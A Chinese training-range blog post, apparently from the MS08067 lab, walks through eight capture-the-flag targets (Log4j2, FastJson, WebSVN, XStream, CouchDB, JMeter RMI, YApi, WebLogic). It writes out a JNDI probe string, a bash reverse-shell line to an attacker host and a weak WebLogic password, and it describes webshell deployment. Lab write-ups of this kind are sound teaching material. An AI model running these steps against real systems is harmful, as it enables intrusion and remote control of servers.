【揭秘一】练武靶场(文末有福利!)

ebee707afc5811c3092aacd396548609.jpeg

Taoing

5bc86799d105393ef6c2796145d4adb8.png

“MS08067实验室,专注于网络安全技能培训与服务。"

号外号外,"Ms08067练武场" 最强劲的第一批选手打靶思路来啦。

官网链接:http://attck.ms08067.com/


Part1

cf4452b17477d334b3e66961561fd52b.png

log4j2,⽬标站点:http://27.25.151.24:29458/hello?payload=111

访问站点后,发现参数payload为可控点后, 对该参数进行黑盒测试

32bbede081d65ebc1413301c96d4633f.png尝试JNDI注入时, 语句为:${jndi:dns://teg756.dnslog.cn}

718627eb2bf681af7a0fde63324da248.png得到dnslog回显记录, 说明目标服务器存在JNDI漏洞, 并且可出网

783b73d73fb15b9cc96a0fb71ec273a5.png

使用JNDI-Injection-Exploit.jar工具生成反弹shell :
(反弹语句:bash -i >& /dev/tcp/xx..xx.88/10001 0>&1)

9b531e76953befb36dd25c8c951934e7.png在攻击机上监听10001端口后, 将JNDI-Exploit生成反弹shell发送给服务器

ba15a62d18f2bd318f94c82794586e9f.png攻击机得到目标bash

659eab9e2954c9e5898b380dbfaf6c15.png获取环境变量得到flag{b423788e-d7b7-4e1abd58-9e73b447d575}    8ab733deaa7b9dfce374cb8faf9807a4.png

Part2

301d4a990c48ef1197b03830d2cf0cab.png测试目标:目标站点:http://27.25.151.24:23953/
漏洞发现:FastJson 反序列化漏洞访问漏洞所在URL后, 服务器返回了数据信息, 并且通过标题图标获得服务器是Java语言SpringBoot框架开发的Web程序

7aab82c91a8b2597e0797e11ac5cd184.png 浏览器中按快捷键F12调出开发者⼯具, 在标签中选择网络, 重新访问⻚面服务器响的Content-Type, 知道了目标服务器发送过来的是⼀串json数据

a959b96a8407bdf944959d72a5fcea9a.pngJava中, 处理Json数据⼀般使用的框架:Jackson、Fastjson 等尝试对其Java框架中, 处理Json数据的组件进行黑盒测试。经过测试多种组件的payload后, 发现存在FastJson反序列化漏洞CVE-2017-18349
(1) 构造⼀个请求DNS的Payload发送给服务器后, dnslog中可以看到目标服务器出网

51687c47fb52fc10304aea1ef00d2543.png

ac9134441a6bcc2fcdb85c6c5c953bdc.png(2)在攻击机上使用JNDI-Injection-Exploit工具生成JNDI反弹shell, nc进行监听10001端口

d2f158bc843cb2752d5b916346d330d9.png

81498309f13aa8ba928e22ef3d7d95ed.png(3) 发送 Payload 给服务器后, 攻击机的JNDI注入工具得到回连信息

ef3f619ec1572c54e6158e17534f6651.png

10502d1f627ed944a9a5fdb5018efd0d.png
(4) ⽬标服务器成功将Shell反弹到nc, 获取flag
b0b1a20fc471aa570eea4faf9def7a61.png


Part3

dec79759845fbee5608d9a7501b54d43.png测试目标:http://27.25.151.24:25021
漏洞发现:WebSVN 命令执行
漏洞所在URL:   

http://27.25.151.24:25021/search.php?repname=test&search=test

漏洞参数:search

WebSVN 命令执行复现过程:
(1) 尝试对search参数进行SQL注入时, 发现命令执行的报错提示

6368a5f4322bd77d81e9e941f2c64aa6.png(2) 既然search参数是作为命令执行的输入, 可以构造如下payload进行测试, 成功出网

f172a0f69d92adc711c9e794bdcef728.png

62ce0366e84b684ad7360ccebb58fc21.png(3)目标服务器可以出网则构造反弹shell的payload, 且攻击机上监听10001端口

998d86e595c88f5f49ab936df933d138.png

f99468fb275571aa39a9aff1b582ad6d.png(4) nc获得反弹shell, 使用export命令获取系统环境变量, 取得flag

f16c25b108b7e1ea7532def622f6b926.png

Part4

55be569578f757f51a09aa64ed724204.png目标站点:http://27.25.151.24:23531
漏洞发现:xstream 反序列化漏洞
漏洞所在URL:http://27.25.151.24:23531
首先访问⻚面, 看到返回信息提示 hello, input your information please

d8b50812875b671d488890c4252852b5.pngBurpSuite抓包后, 将原先的GET方法替换为POST方法, 得到了服务器500状态码信息,可收集到的信息: 

e4a2cec168910e7ce0ffb4b5bd5ff314.png1.报错⻚面的信息:Whitelabel Error Page 这是SpringBoot框架的报错⻚面(后端Java开发)
2.Java后端Web语⾔中可能存在使用了数据处理的组件, 例如:xstream、fastjson 等,经过测试多种组件的payload后,发现存在Xstream反序列化漏洞(CVE-2021-21351)
(1)在攻击机上使用JNDI-Injection-Exploit工具生成JNDI反弹shell, nc进行监听10001端口

7a09f227e83a0cad58b371883310597f.png

77f42a5ee8f5d47d1fe30018ea26ffe8.png(2) POST请求体中发送 Payload 给服务器后, 攻击机JNDI注入工具得到回连信息

4749a00f2272b9ee1484ad6ba5b6aece.png

196a851d0a4ebe1b1177a01c44f7ddf9.png(3) 目标服务器成功将Shell反弹到nc, 拿下flag

7d0e332f566582bcdab45bbb503bbcf3.png

Part5

432ca099d99354ab9a4de19201eacfa9.png

目 标站点:http://27.25.151.24:23385/
漏洞发现:
(1) Couchdb 特殊 目 录"_utils"泄露
漏洞所在URL:http://27.25.151.24:23953/_utils/

6e5b0d34751b963fa56f187965d60647.png(2) Couchdb 垂直权限绕过
访问http://27.25.151.24:23385/⻚面后, 服务器返回了类似接口的数据信息

9e8bf4f5b0e22d77e3f3d42fcf628aca.png浏览器F12进入开发者模式看到Couchdb数据库的版本的信息,结合Title图标样式, 可以确定是Couchdb数据库

ae0e6c0fda3b080e38b84631bc3bb880.pngCVE-2017-12635 复现过程:
(1).使用nmap对目标CouchDB非默认端口23385进行扫描, 进一步确定是CouchDB数据库

9a9ca3de642e8c296d397553970078e2.png(2). 尝试向服务器发送json形式的payload, 以创建数据库用户

db3f3c8a3b431d361c00bbe67456abbd.png(3). 数据库接口成功返回用户创建成功的信息
Couchdb 任意命令执行:
通常 CVE-2017-12635 漏洞进行联合的就是 CVE-2017-12636,CVE-2017-12636 需要管理员权限的账户才能进行利用
CVE-2017-12636 复现过程:
(1) 尝试发送Payload给服务器后, 成功返回创建数据库、创建表、插入数据的信息

ee965def7fdd2041a2575c4bdd4f1e8c.png(2) POST请求调用第一个curl命令中所建立的反弹shell, 并且在攻击机上监听10001端口

22c1d82f898e02643192a1a33e9b9dd4.png(3) 目标bash成功反弹到攻击机, 通过export命令获取到flag

c5e62bab3b6f04fa890696435b0a778c.png

Part6

81dfb7a4070d48f17cba8d6822b7decf.png目标站点:27.25.151.24:24980
漏洞发现:Jmeter RMI 反序列化命令执行漏洞 (CVE-2018-1297)Jmeter RMI 反序列化漏洞复现过程如下:
(1) 使用 nmap 扫描目标时, 存在RMI服务, 目标将RMI服务1099端口映射到24980端⼝

5c44c71510c32c16fb5d832a8b993303.png(2) 使用ysoserial工具尝试进行对24980的RMI服务注入后, 判断出网成功

b3994c8da2bf31f76be053828fe7be4a.png(3) 使用ysoserial发送反弹shell, 并在攻击机上监听10001端口

10c488a62fae5d55a7fa43715be8c90e.png(4) 攻击机上成功获得目标服务器反弹过来的shell, 拿下flag

07792ffba550c2f7089843546f575d2f.png

Part7

da135fbdff7296011f6d61f0cd8b2911.png目标站点:http://27.25.151.24:24387 2.
漏洞发现:Yapi 任意代码执行漏洞
漏洞复现:
(1) 在目标站点的Yapi  1.8.3管理⻚面中, 注册⼀个用户

8031b23686c6f16e08ee261d6a41baee.png(2) 在个人空间的接口中添加⼀个项目和接口, 用于接收和运行全局mock脚本

b6293dd6c3bfa9874776b565a7540e47.png

43d8bde3ace58492a406c157ef447682.png(3) 在个人中心的设置中, 插入⼀个全局mock脚本的Payload后进行保存

820d04ac25a7bbb7e751a333129e8d74.png(4) 进入到个人中心的接口处, 查看刚刚创建的test项目预览, 访问其中的Mock地址

945b341a6d1d43221ec1f728bcf58cd2.png(5) 命令执行成功, 权限为root

3b36b7506e91e5a7149c4326f44da782.png(6) 进⼀步利用反弹至nc时, 查看⼀下/bin/sh的链接

971a1c175b342e507dde4dd6e9aa7d82.png(7) 修改bash指向后, 访问Mock地址, 使其生效

ed4ca441c3ceac44884de7949ce31c3b.png(8)在全局Mock脚本中构造反弹payload后,访问Mock地址,从而反弹至攻击机的10001端⼝

bebbc8ea59526e284fcb7395e0d3c144.png

6bd42b58de830d6b46b05246c823e8b7.png

Part 8

c7c5f6230d47b7d200244d3cbfa01b84.png目标站点:http://27.25.151.24:21634
漏洞发现:Weblogic 弱口令
漏洞所在URL:http://27.25.151.24:21634/console/
访问http://27.25.151.24:21634⻚面, 看到返回信息是Weblogic的默认错误⻚面

e8863c26c7e006355a84bf55bb1bccc8.pngWeblogic弱⼝令到GetShell复现过程:
(1) 尝试爆破Weblogic默认账户密码后, 成功进⼊Weblogic控制台⻚面
username:weblogic、password:Oracle@123

9374105e0c23100b7c5bcc54ec44fe08.png(2) 使用哥斯拉生成⼀个jsp的webshell, 将jsp儿文件进行zip压缩后, 将后缀名改为war

18deb6d37ab2430e22de1f85c350527d.png在部署 -> 安装 -> 上传文件中上传shell.war文件, 并⼀路以默认设置点击下⼀步 ,上传完成后, 在部署控制⻚面, 可以看到已经上传了的shell

f46160a2d2cd27538e911073f7a13b18.png

9998cb63380a59dff216afce5dc4b16b.png(3) 使用哥斯拉进行连接测试成功, 并且拿到flag

27486565fddfa2e1f43d1af0b4519fef.png

e939e8c511f6384207c6d8fdf5619a4e.png

福利环节   

关注公众号,转发此文并留言互动,凡上榜者均有机会获得靶场15天试用名额。(共30个名额)

线上地址:http://attck.ms08067.com

唯一试用要求:试用靶场结束后须提出您的宝贵意见建议!

☎️ 加入靶场交流群

微信:下方二维码

在网络安全这条充满挑战的道路上,MS08067练武场愿与您携手前行,共同成长。我们将继续努力,为您提供更优质的实战演练环境和学习资源,帮助您在网络安全领域取得更大的成就。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值